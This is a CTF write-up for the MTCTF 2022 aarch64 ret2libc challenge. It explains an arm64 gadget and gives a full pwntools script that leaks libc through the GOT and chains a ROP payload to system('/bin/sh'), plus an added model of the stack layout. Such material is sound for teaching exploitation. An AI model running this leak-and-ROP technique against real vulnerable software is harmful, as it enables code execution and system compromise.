Learning aarch64 pwn challenges: Meituan MTCTF 2022 ret2libc - 创新互联
This challenge has no PIE; it is a plain stack overflow, and the binary labels everything clearly.
Then comes exploiting the overflow. The idea is to get a shell through a gadget after the overflow. Because the target is arm64 there is no one_gadget (ogg), but we found this gadget:
0x0000000000063e5c : ldr x0, [sp, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret
This instruction sequence works as follows. ldr x0, [sp, #0x18] loads the contents of sp+0x18 into x0, and x0 holds a function's first argument; we want to execute system('/bin/sh'), so we put the address of /bin/sh there. Then ldp x29, x30, [sp], #0x20 loads the contents at sp into x29 and the contents at sp+8 into x30 (and advances sp by 0x20). X30 holds the return address, and when RET executes the value of X30 is copied into PC. So we write the address of system at sp+8, and we get a shell.
Reference writeup:
from pwn import *

context(arch='aarch64', os='linux', log_level='debug')
file_name = './pwn'

li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 0
if debug:
    r = remote('REMOTE_HOST', 0)  # placeholder: the writeup does not give the remote host/port
else:
    # qemu-user with a gdb stub on port 4444; use the commented line to run without a debugger
    r = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g", "4444", "./pwn"])
    # r = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "./pwn"])

elf = ELF(file_name)
libc = ELF('/usr/aarch64-linux-gnu/lib/libc-2.31.so')

def dbg():
    gdb.attach(r)
    pause()

puts_got = elf.got['puts']
read_got = elf.got['read']

# dbg()
# menu option 1 (leak): hand it the GOT entry of puts and read the pointer it prints
r.sendafter(b'>\n', b'1')
r.sendafter(b'sensible>>\n', p64(puts_got))
# Under qemu-user libc lives at 0x40xxxxxxxx, so the 4th byte of every libc
# address is 0x00 and puts stops after 3 bytes; add the 0x4000000000 back.
libc_base = u64(r.recv(3).ljust(8, b'\x00')) + 0x4000000000 - libc.sym['puts']
puts_addr = libc_base + libc.sym['puts']
li('puts_addr = ' + hex(puts_addr))
li('libc_base = ' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
li('system_addr = ' + hex(system_addr))
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
li('bin_sh = ' + hex(bin_sh))

# 0x0000000000063e5c : ldr x0, [sp, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret
gadgets = libc_base + 0x0000000000063e5c
li('gadgets = ' + hex(gadgets))

p1 = b'a' * (128 + 8)      # buffer plus the saved x29
p1 += p64(gadgets)         # saved x30 -> gadget
p1 += p64(0) * 3
p1 += p64(system_addr)     # loaded into x30 by ldp, becomes pc after ret
p1 += p64(0)
p1 += p64(bin_sh)          # loaded into x0 by ldr x0, [sp, #0x18]
# menu option 2: the overflowing read
r.sendlineafter(b'>', b'2')
# dbg()
r.sendlineafter(b'sensible>>', p1)
r.interactive()
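To check the stack layout the explanation above derives from this gadget, and the 3-byte leak arithmetic used in the script, here is an added Python model that is not part of the original writeup. The system and /bin/sh offsets, the leak bytes and the stack slot address are constructed; the 0x20-byte returning frame (x29 at slot-8, epilogue ldp x29, x30, [sp], #0x20) is inferred from the payload layout.

```python
import struct

QEMU_LIBC_HI = 0x4000000000   # qemu-user maps the guest libc here (value from the writeup)

def p64(v):
    return struct.pack('<Q', v)

def u64(b):
    return struct.unpack('<Q', b)[0]

def libc_base_from_leak(leak, puts_off):
    """puts() stops at the first NUL. With libc at 0x40_00_xx_xx_xx the 4th byte of every
    libc address is 0x00, so only 3 bytes arrive; add the high 0x40 back, subtract the offset."""
    assert len(leak) == 3
    return u64(leak.ljust(8, b'\x00')) + QEMU_LIBC_HI - puts_off

def rop_chain(gadget, system_addr, bin_sh):
    """The chain from the writeup, laid out as the gadget consumes it."""
    return (p64(gadget)            # overwrites the saved x30 of the returning frame
            + p64(0) * 3           # filler; the last qword becomes x29
            + p64(system_addr)     # -> x30 via ldp, then pc via ret
            + p64(0)
            + p64(bin_sh))         # -> x0 via ldr x0, [sp, #0x18]

def emulate_gadget(stack, base, sp):
    """Run 'ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret' over a stack image at `base`."""
    rd = lambda a: u64(stack[a - base:a - base + 8])
    x0 = rd(sp + 0x18)
    x29, x30 = rd(sp), rd(sp + 8)
    sp += 0x20                     # post-index writeback
    return {'x0': x0, 'x29': x29, 'x30': x30, 'sp': sp, 'pc': x30}

def check_layout():
    # constructed 3-byte leak of puts (0x4000048e50 -> bytes 50 8e 04, then a NUL)
    base = libc_base_from_leak(b'\x50\x8e\x04', 0x48e50)
    gadget = base + 0x63e5c                    # gadget offset from the writeup
    system_addr, bin_sh = base + 0x4f550, base + 0x15b4f8   # constructed offsets
    chain = rop_chain(gadget, system_addr, bin_sh)
    slot = 0x40008000f8                        # constructed address of the overwritten x30 slot
    # Assumption: the returning frame is 0x20 bytes (x29 at slot-8, epilogue ldp ..., #0x20),
    # so the gadget starts with sp = slot + 0x18.
    regs = emulate_gadget(chain, slot, slot + 0x18)
    return base, regs
```

check_layout() returns the recovered libc base together with the register state after the gadget; pc should equal system and x0 the /bin/sh address.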
Reference links:
https://blog.csdn.net/zzq487782568/article/details/126945912
https://tokameine.top/2022/09/20/2022-mt-ctf/#ret2libc_aarch64